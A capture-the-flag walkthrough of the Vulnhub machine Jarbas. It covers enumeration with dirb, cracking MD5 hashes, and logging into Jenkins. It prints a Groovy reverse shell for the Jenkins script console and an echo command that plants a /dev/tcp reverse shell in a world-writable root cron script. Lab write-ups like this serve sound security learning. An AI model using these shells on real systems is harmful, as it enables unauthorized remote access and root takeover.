Jarbas: 1 | Vulnhub Walkthrough
Jarbas is beginner friendly CTF challenge created by Tiago Tavares and hosted on Vulnhub. Tiago has designed another entry level box named as Lampião, which was equally fun.
Level: Beginner
I started with an arp-scan to identify the target IP address. Nmap scans looked promising with apparently two web applications(on port 80 and 8080), MySQL service(3306) and SSH(22).
Enumeration and Initial Foothold
The application on port 80 was some bizarre looking search engine with no functional links. On port 8080, there was a Jenkins console which looked interesting. I launched a full brute-force attack on the console using the Metasploit module with a custom word-list created using cewl and john the ripper assuming the username was admin. Some times over confidence just hurts!
I wasted almost an hour to understand that I needed to perform further enumeration. Exposed MySQL port was not accepting any connections remotely.
Before running my brute-force attack I fired up one round of dirb and nikto to find nothing of interest. Later, after the useless attempt to brute-force my way in, I launched dirb with bigger word-lists, again with no luck. I thought of playing around with the extensions then.
dirb http://192.168.56.101/ -w /usr/share/wordlists/dirb/big.txt -X .txt,.html
Access.html was all I needed, it had three password hashes with usernames. I used hash-identifier to quickly confirm that the hashes were indeed MD5. I pasted the hashes into crackstation.net. Generally I prefer to give a try with online tools before starting an offline cracking attempt.
Three out of three! That’s a good omen. However out of the three, only last pair was working. I logged into Jenkins as Eder Luis.
eder: vipsu
Many Hidden (Not-So-Hidden) Secrets of Jenkins
Jenkins is an automation server used to automate SDLC life cycle. Jenkins is a very powerful automation tool and is a common product used in many firms. I have seen at-least 3–4 instances of jenkins in real world pentest.
Jenkins has a builtin script console which runs Groovy commands. Apache Groovy is a new generation language, which is syntactically the twin brother of Java. I am no expert in taking a lecture on how Groovy is different from or same as Java, but I know that the Java reverse shell one liner in pentestmonkey works fine with Jenkins!
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.102/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
I got a really messed up shell which repeats every word I type :/
Path to Root
In my enumeration, I figured out a cronjob entry for a cleaning script running as root. Further to my excitement I figured out that the script was writable to all users. I just appended a reverse shell command to the cleaning script and waited for the root shell.
echo "0<&196;exec 196<>/dev/tcp/192.168.56.102/4445; /bin/bash <&196 >&196 2>&196" >> /etc/script/CleaningScript.sh
In two or three minutes I got a connection back. Flag can be read from /root/flag.txt
Jarbas is a beginner level challenge with not many twists. There was another user Eder in the box, with entry on /etc/passwd. If the privilege escalation scenario involved multiple escalations involving Eder, it would have been more fun.